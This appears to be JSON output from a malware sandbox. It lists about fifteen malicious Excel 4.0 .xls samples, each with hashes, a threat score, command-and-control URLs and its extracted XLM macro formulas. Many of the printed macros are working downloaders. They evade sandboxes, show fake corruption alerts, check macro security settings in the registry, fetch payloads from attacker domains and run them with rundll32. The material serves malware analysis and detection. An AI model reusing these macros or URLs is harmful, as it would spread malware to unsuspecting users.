{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6117502fc96597419c142167e3905830d1f79e4f3f6fef50f4ddd2846f393c5"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b6117502fc96597419c142167e3905830d1f79e4f3f6fef50f4ddd2846f393c5","filesize":185344,"md5":"0d11ae457874a155a6baca210b165075","sha1":"d14074a8cc99c1b922e5ba39cee1685b7a1c1a83","sha256":"b6117502fc96597419c142167e3905830d1f79e4f3f6fef50f4ddd2846f393c5","sha512":"b099b6938c43ff61b42552b4147ba6018357c62682458440026f739909fb07ca3bc4864bdc1fb8a3b643bd1abf0e02f9e86ebdcb6c2fcc1426cccf39c721cc43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6117502fc96597419c142167e3905830d1f79e4f3f6fef50f4ddd2846f393c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b613b5fcad4d8ff40f3b065fc7bfdbe7b57ab91b8892728e70145cb731fe6cd6"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b613b5fcad4d8ff40f3b065fc7bfdbe7b57ab91b8892728e70145cb731fe6cd6","filesize":145920,"md5":"fe20fc179981fc20b5cf4203988bbf2f","sha1":"f0f2f440de2e522c242d8fc081dec503654f6bf4","sha256":"b613b5fcad4d8ff40f3b065fc7bfdbe7b57ab91b8892728e70145cb731fe6cd6","sha512":"00c16d3d95e6d901b1069a1faefd9451fc88247a4030401b2ce4959c170c743689b46b65589c645e15268d93794dca2257d6d7820fce273b482fe5d84c0f518d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b613b5fcad4d8ff40f3b065fc7bfdbe7b57ab91b8892728e70145cb731fe6cd6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"CkCyk5fy1t\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b61458a91f5b27f1f742023cf12d99050d46a5774b4385c011e0d062b0acca51"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b61458a91f5b27f1f742023cf12d99050d46a5774b4385c011e0d062b0acca51","filesize":152576,"md5":"a781ef5dbc5afff93336fdcea0f8b9e9","sha1":"9c25d2ca249fd1e61b35d358e6d5dff0564cea2a","sha256":"b61458a91f5b27f1f742023cf12d99050d46a5774b4385c011e0d062b0acca51","sha512":"cfd74c92f3e66ef96719eb7febc7e073d1c9a4c3aa0f971216d2bbe475ffcb5d119bed7b4f4b65d941231ec8f53ef488a507a75a7731bd8b4827713f56cbdf93","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b61458a91f5b27f1f742023cf12d99050d46a5774b4385c011e0d062b0acca51.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QCiOIIbMOP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b61c2abce382c1f2b9ba7993cbdafa878513b9ecc2cfe9d2155093e5ed00f25c"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b61c2abce382c1f2b9ba7993cbdafa878513b9ecc2cfe9d2155093e5ed00f25c","filesize":185344,"md5":"373857a5a1c0602df1913e274b289498","sha1":"32e38053a38654e4a1773038f01bcf7eeb05ff80","sha256":"b61c2abce382c1f2b9ba7993cbdafa878513b9ecc2cfe9d2155093e5ed00f25c","sha512":"c71f0fb78a1532974829b509bea1544955f74a42b33ccd583c9d229d1070175c8aba2ff4212f4b06f49cfa8a8ff520ac25a285d9d2f792748d0b199857c2bb91","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b61c2abce382c1f2b9ba7993cbdafa878513b9ecc2cfe9d2155093e5ed00f25c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b61fc81965b306dd46a26c1b0dee27838f59c4dc004830d80d6f4c4a4309d483"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b61fc81965b306dd46a26c1b0dee27838f59c4dc004830d80d6f4c4a4309d483","filesize":160768,"md5":"e4f58c274fc04848d1f7a2afe245ba6e","sha1":"5564525491f1131cdefee55e8f5391848b1afca1","sha256":"b61fc81965b306dd46a26c1b0dee27838f59c4dc004830d80d6f4c4a4309d483","sha512":"3f52737c0d02b1cca3389fe5d69902c28521b3d986852a456cf6dfd58157ac5908695b1fb9cd5ea5147f43f951db5def5b30f58de1615f89762fec292267a72f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b61fc81965b306dd46a26c1b0dee27838f59c4dc004830d80d6f4c4a4309d483.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qI1e4mBZ4W\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b639c09adfa75085715cab06242e22abdbf7350790809453494064c5ee03f76c"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b639c09adfa75085715cab06242e22abdbf7350790809453494064c5ee03f76c","filesize":206336,"md5":"1fc33fecaa54dcc62564cafeefc74497","sha1":"a0ec7fdfc7836c455188bf91411105c2b456db5a","sha256":"b639c09adfa75085715cab06242e22abdbf7350790809453494064c5ee03f76c","sha512":"0ca6ab64d96ff2d7b8f918e107a77f3feb2f19087ad75198b93c32a6601c5acc0c6dd42c5dee34e14663ca3416aa622f00beee95a4269ad52a87e1a23a1560da","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b639c09adfa75085715cab06242e22abdbf7350790809453494064c5ee03f76c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3y1NWHi4uf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b648011886ecf99d3684d4862174708a181561a5e7ebd4d70ced063ed622707f"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b648011886ecf99d3684d4862174708a181561a5e7ebd4d70ced063ed622707f","filesize":171008,"md5":"5b67e7a5aa9dd4755eedfbd043d685dc","sha1":"396c98fdbb395d22429a996d0584b6ccc6252119","sha256":"b648011886ecf99d3684d4862174708a181561a5e7ebd4d70ced063ed622707f","sha512":"742c61591502de41c530142a7b6af3431ebb7d01d81ff6891c2a63500c25f3ba78de078f4f5878ce0908a2011392cc16518ebca9d3c73fac628dc3a2dea043bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b648011886ecf99d3684d4862174708a181561a5e7ebd4d70ced063ed622707f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KbhcpOu42x\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6544613618fd18e74dafe576e546610aba8765d09a0c127892a2b1acc4147c2"},"analysis":{"reported":"2020-04-09T16:18:29Z","score":10},"files":[{"filename":"b6544613618fd18e74dafe576e546610aba8765d09a0c127892a2b1acc4147c2","filesize":209920,"md5":"4605e6bccd69b35757dca9a7b1598a82","sha1":"4b57bc97cc6b24ae33663f8b43805c6d06a9633a","sha256":"b6544613618fd18e74dafe576e546610aba8765d09a0c127892a2b1acc4147c2","sha512":"3ab73c9218bbafa9659df084efb6187ee42365bbbeef1947f590dc8938ddf36eb433fec703550e2e07aa631b542f4822cfc6b9fe157dcbd6138204e30fbc8ecd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6544613618fd18e74dafe576e546610aba8765d09a0c127892a2b1acc4147c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tVoSc2cch4\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b65a0a0cdce475f34e87ccc6d58a45fa3860aef0b396ca502cc27eb31cb9eba8"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b65a0a0cdce475f34e87ccc6d58a45fa3860aef0b396ca502cc27eb31cb9eba8","filesize":167936,"md5":"c98a6994b923108b13bc3d495530249d","sha1":"5d303400871eed8d5d8d191ad66707b79030578b","sha256":"b65a0a0cdce475f34e87ccc6d58a45fa3860aef0b396ca502cc27eb31cb9eba8","sha512":"5d58c9b94b76ea510fe0aaca650ecb9494924d2912d4d06bb3fb2cbde013538ddc952ab19991583dd04c72c206e665cff63075c53473d9a56ee2e8f9e857d7c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b65a0a0cdce475f34e87ccc6d58a45fa3860aef0b396ca502cc27eb31cb9eba8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZpQrJaWPVw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b66e23b86ddbcb891289e3f2d91ebc4ccbda2807c56188ccbd9a824b8c8c3432"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b66e23b86ddbcb891289e3f2d91ebc4ccbda2807c56188ccbd9a824b8c8c3432","filesize":212992,"md5":"fc1b678245305b27280afd36536bed96","sha1":"c57bae2a555f636e0b5805e90f10633038491e7a","sha256":"b66e23b86ddbcb891289e3f2d91ebc4ccbda2807c56188ccbd9a824b8c8c3432","sha512":"b86e7c24548d99487c0e8d940ae5b67eca28c2164cddcd9c139c4d24f536719a8129e09b3e81ccfcd3d98add831b32d433c9f2f808eeff4634b41bc96328fbef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b66e23b86ddbcb891289e3f2d91ebc4ccbda2807c56188ccbd9a824b8c8c3432.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fkaop97rP8\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b672a216594ef920566ab650742826bdfc3488bcaa52d2d8c55c5ecdbfc1a0de"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b672a216594ef920566ab650742826bdfc3488bcaa52d2d8c55c5ecdbfc1a0de","filesize":170496,"md5":"68c93343f27e8dd38f1b3223a43b4610","sha1":"9efee93dc55559ac2d88c601bad81fd4f2edbc74","sha256":"b672a216594ef920566ab650742826bdfc3488bcaa52d2d8c55c5ecdbfc1a0de","sha512":"4f25e8c398033df222524b9642d47dc0c387be249423fdb42dbfd48cb33bd6e1d2716a9b29e0ac1bc15dbec77314692deafdf66a5d414fe7c4efe029aff52b2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b672a216594ef920566ab650742826bdfc3488bcaa52d2d8c55c5ecdbfc1a0de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"18gXPvJpkH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b678d328a188204f58a54f37ee1a4f4d25d332b1b1e412d165e0a144ff227b71"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b678d328a188204f58a54f37ee1a4f4d25d332b1b1e412d165e0a144ff227b71","filesize":142848,"md5":"96a946c0eb4d3f51f1566e44a0cfa568","sha1":"8b90015f1e57379fa56d4c3b0d06075549e521e7","sha256":"b678d328a188204f58a54f37ee1a4f4d25d332b1b1e412d165e0a144ff227b71","sha512":"e6bbe5528c1bf7a6c9e178ad05505f9d526cbc8ba95eeebf3958fd54eb49d598c9ccdab05033e51ba261098a6aad9aa626d8475384f781a396127c753b1e7d3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b678d328a188204f58a54f37ee1a4f4d25d332b1b1e412d165e0a144ff227b71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"wAeAleYA8X\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b6819c6c0ff64352d74cabaf38b17afdaf17f3def15093f4814e76eb19d01652"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b6819c6c0ff64352d74cabaf38b17afdaf17f3def15093f4814e76eb19d01652","filesize":112640,"md5":"ebdcff08bda1c2b8f70ea9525dba991f","sha1":"1eb4ffec545189568fa5ae53e2ab0d2f88abb0aa","sha256":"b6819c6c0ff64352d74cabaf38b17afdaf17f3def15093f4814e76eb19d01652","sha512":"002bf5384e979fe472d4af473a4110e446e5c40bc6c7611be9e460ffa60c87bd8687efcb20f0c1d50dd7c829679b06419b43c4052520f6ee827b7781c97c6cdc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b6819c6c0ff64352d74cabaf38b17afdaf17f3def15093f4814e76eb19d01652.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b68390d298979c328da1701d4f5abb88abcf1a33caa6b21e30fd19a2d9268b64"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b68390d298979c328da1701d4f5abb88abcf1a33caa6b21e30fd19a2d9268b64","filesize":160768,"md5":"f351bf6511911d024e56826c58f520ca","sha1":"f1feee29d903a757bc0b43435a7d0d48e5a06281","sha256":"b68390d298979c328da1701d4f5abb88abcf1a33caa6b21e30fd19a2d9268b64","sha512":"f54a3e28209323f91eb40f45e7c1c2f446c23de36b87ebfa88a719da0cc534ff61a814c664462a8d271e76d8bc60e9afb15a4302f4f4cdd6dff5278a2df2e476","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b68390d298979c328da1701d4f5abb88abcf1a33caa6b21e30fd19a2d9268b64.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JGZ4iY9iHL\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b69960883b60d487f6066807534095a75ab12eb096292fce79e6ac60d607f95e"},"analysis":{"reported":"2020-04-09T16:18:30Z","score":10},"files":[{"filename":"b69960883b60d487f6066807534095a75ab12eb096292fce79e6ac60d607f95e","filesize":126464,"md5":"2651f6c0eadb2d093171ba6ff098c26c","sha1":"0e9c688e7c6caac43cda6247c54174ca387f773a","sha256":"b69960883b60d487f6066807534095a75ab12eb096292fce79e6ac60d607f95e","sha512":"e8514df3787f944a75529d4e43e4711768a1c3ba2c383cec40b41de66592a8fb71d0d9a569bf50af2a905f5e0d2b2d3e1918ea246f22247a8f2245fc9d0dce27","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b69960883b60d487f6066807534095a75ab12eb096292fce79e6ac60d607f95e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
